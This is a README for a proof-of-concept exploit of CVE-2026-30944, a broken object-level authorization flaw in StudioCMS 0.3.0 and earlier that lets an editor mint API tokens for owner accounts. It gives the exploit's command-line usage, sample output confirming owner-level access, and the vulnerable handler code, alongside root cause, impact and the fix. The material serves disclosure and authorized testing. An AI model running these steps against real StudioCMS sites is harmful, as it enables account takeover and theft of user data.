Share
## https://sploitus.com/exploit?id=8EDAA12B-717B-5A59-9916-F67977827A57
๐ CVE-2026-30944
StudioCMS Privilege Escalation via Insecure API Token Generation
NVD โข
Advisory โข
CWE-639
---
## Overview
The `POST /studiocms_api/dashboard/api-tokens` endpoint in **StudioCMS โค 0.3.0** allows any authenticated user (at minimum `Editor` role) to generate API tokens for **any other user**, including `owner` and `admin` accounts.
The endpoint accepts a `user` parameter in the request body specifying the target user UUID but **never validates** whether the requesting user is authorized to create tokens on behalf of that target. This is a classic **Broken Object Level Authorization (BOLA)** vulnerability that results in full privilege escalation.
### Attack Flow
```
โโโโโโโโโโโโโโโโ POST /api-tokens โโโโโโโโโโโโโโโโ
โ โ {"user":""} โ โ
โ Attacker โ โโโโโโโโโโโโโโโโโโโโโโโโโโบ โ StudioCMS โ
โ (Editor) โ โ Server โ
โ โ โโโโโโโโโโโโโโโโโโโโโโโโโโ โ โ
โโโโโโโโโโโโโโโโ {"token":"eyJhb..."} โโโโโโโโโโโโโโโโ
โ โ
โ GET /rest/v1/users โ
โ Authorization: Bearer โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโบโ
โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ [Full user data as Owner] โ
โ โ
```
### Vulnerability Details
| Field | Value |
|---|---|
| **CVE** | [CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944) |
| **GHSA** | [GHSA-667w-mmh7-mrr4](https://github.com/withstudiocms/studiocms/security/advisories/GHSA-667w-mmh7-mrr4) |
| **CVSS v3.1** | **8.8** (High) โ `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| **CWE** | CWE-639: Authorization Bypass Through User-Controlled Key |
| **CWE (secondary)** | CWE-863: Incorrect Authorization |
| **MITRE ATT&CK** | T1134 โ Access Token Manipulation |
| **OWASP API** | API1:2023 โ Broken Object Level Authorization |
| **Affected** | `studiocms โค 0.3.0` |
| **Fixed in** | `studiocms 0.4.0` |
---
## Contents
| File | Description |
|---|---|
| `cve_2026_30944_poc.py` | Python exploitation script with manual & automated modes |
| `README.md` | This file |
| `LICENSE` | MIT License |
---
## Prerequisites
- **StudioCMS โค 0.3.0** (vulnerable version)
- Python 3.8+
- Valid credentials for at least an `Editor` account
```bash
pip install requests colorama
```
---
## Quick Start
### Manual Exploitation
```bash
# Generate an API token for the owner using an editor account
python3 cve_2026_30944_poc.py \
-u http://localhost:4321 \
--username editor01 \
--password editorpass \
--uuid 2450bf33-0135-4142-80be-9854f9a5e9f1
# Save results to JSON
python3 cve_2026_30944_poc.py \
-u http://localhost:4321 \
--username editor01 \
--password editorpass \
--uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
--save
```
### Automated Testing
```bash
# Test with multiple roles to confirm the vulnerability
python3 cve_2026_30944_poc.py \
-u http://localhost:4321 \
--auto-test \
--editor-user editor01 \
--editor-pass editorpass \
--visitor-user visitor01 \
--visitor-pass visitorpass \
--uuid 2450bf33-0135-4142-80be-9854f9a5e9f1
```
---
## Arguments
### Required
| Argument | Description |
|---|---|
| `-u, --url` | Target StudioCMS base URL |
| `--uuid` | Target user UUID (e.g., owner account) |
### Manual Mode
| Argument | Description |
|---|---|
| `--username` | Username for authentication |
| `--password` | Password for authentication |
### Automated Test Mode
| Argument | Description |
|---|---|
| `--auto-test` | Enable automated multi-role testing |
| `--editor-user` | Editor account username |
| `--editor-pass` | Editor account password |
| `--visitor-user` | Visitor account username |
| `--visitor-pass` | Visitor account password |
### Optional
| Argument | Description |
|---|---|
| `--save` | Save results to JSON file |
| `--no-ssl-verify` | Disable SSL certificate verification |
---
## Example Output
### Vulnerable System
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
PHASE 1: Authentication
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] Authenticated as 'editor01'
[*] Session user: editor01 (editor)
[*] Session UUID: 39b3e7d3-5eb0-48e1-abdc-ce95a57b212c
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
PHASE 2: Privilege Escalation
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
[*] Generating API token for target user...
[+] API token generated successfully!
[!] Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2...
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
PHASE 3: Verification
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Verifying token access on REST API...
[+] VULNERABILITY CONFIRMED โ Full API access achieved!
[*] Retrieved 9 user records
```
### Patched System
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
PHASE 2: Privilege Escalation
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
[*] Generating API token for target user...
[*] Access denied (403 Forbidden) โ endpoint may be patched
[-] Exploitation failed โ token not generated
```
---
## Root Cause
The vulnerable handler at `packages/studiocms/frontend/pages/studiocms_api/dashboard/api-tokens.ts` (lines 16โ57) accepts a `user` parameter from the JSON body and passes it directly to the token generation function without authorization checks:
```typescript
// [1] Only checks if caller is editor โ not WHO they're creating a token for
const isAuthorized = ctx.locals.StudioCMS.security?.userPermissionLevel.isEditor;
// [2] 'user' from request body โ no validation against authenticated session
const jsonData = yield* readAPIContextJson(ctx);
// [3] Passed directly to token generation โ IDOR
const newToken = yield* sdk.REST_API.tokens.new(jsonData.user, jsonData.description);
```
The authorization model only verifies *"is the caller at least an editor?"* instead of *"is the caller authorized to create a token for this specific user?"*
---
## Impact
- **Privilege Escalation** โ Any editor can escalate to owner-level API access
- **Full API Access** โ Generated token grants unrestricted access to all REST endpoints
- **Account Takeover** โ Attacker can impersonate any user by specifying their UUID
- **Data Breach** โ Access to user listings, content, and system configuration
---
## Mitigation
Update StudioCMS to version **0.4.0** or later:
```bash
npm install studiocms@latest
```
---
## Legal Disclaimer
**This tool is provided for educational and authorized security testing purposes only.**
- Only use against systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal in most jurisdictions
- The author assumes no liability for misuse of this tool
- Always follow responsible disclosure practices
---
## References
- **CVE:** [CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944)
- **Advisory:** [GHSA-667w-mmh7-mrr4](https://github.com/withstudiocms/studiocms/security/advisories/GHSA-667w-mmh7-mrr4)
- **CWE:** [CWE-639 โ Authorization Bypass Through User-Controlled Key](https://cwe.mitre.org/data/definitions/639.html)
- **OWASP:** [API1:2023 โ Broken Object Level Authorization](https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/)
- **MITRE ATT&CK:** [T1134 โ Access Token Manipulation](https://attack.mitre.org/techniques/T1134/)
---
## Author
**Filipe Gaudard**
---
## License
This PoC is released under the [MIT License](LICENSE) for educational purposes. Use responsibly and ethically.